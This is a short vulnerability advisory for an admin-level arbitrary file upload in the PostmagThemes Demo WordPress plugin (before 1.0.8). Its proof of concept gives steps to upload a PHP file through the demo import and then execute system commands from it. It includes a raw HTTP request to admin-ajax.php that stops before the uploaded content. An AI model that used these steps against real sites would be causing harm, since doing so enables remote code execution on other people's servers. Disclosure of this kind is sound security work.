PostmagThemes Demo < 1.0.8 - Admin+ Arbitrary File Upload

The plugin does not validate the imported file, allowing high-privilege users such as admin to upload arbitrary files (such as PHP) leading to RCE.

PoC

1. Go to Appearance » Import Demo Data » Manual demo files upload » Run “Choose a JSON file for customizer import” and import a PHP file. 2. Click Import Demo Data to upload the file. 3. Page returns a 500 error, but the PHP file has been saved in the uploads File Folder. 4. Access the URL to execute system commands the URL: https://example.com/wp-content/uploads///info.php POST /wp-admin/admin-ajax.php HTTP/1.1 Host: localwp.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localwp.com/wp-admin/themes.php?page=pt-one-click-demo-import X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------9264893373035956623827474357 Content-Length: 1063 Origin: http://localwp.com Authorization: Basic YWRtaW46YWRtaW4= Connection: close Cookie: admin cookie -----------------------------9264893373035956623827474357 Content-Disposition: form-data; name=“action” pmdi_import_demo_data -----------------------------9264893373035956623827474357 Content-Disposition: form-data; name=“security” c34afc948b -----------------------------9264893373035956623827474357 Content-Disposition: form-data; name=“selected” undefined -----------------------------9264893373035956623827474357 Content-Disposition: form-data; name=“content_file” undefined -----------------------------9264893373035956623827474357 Content-Disposition: form-data; name=“widget_file”; filename=“123.json” Content-Type: application/json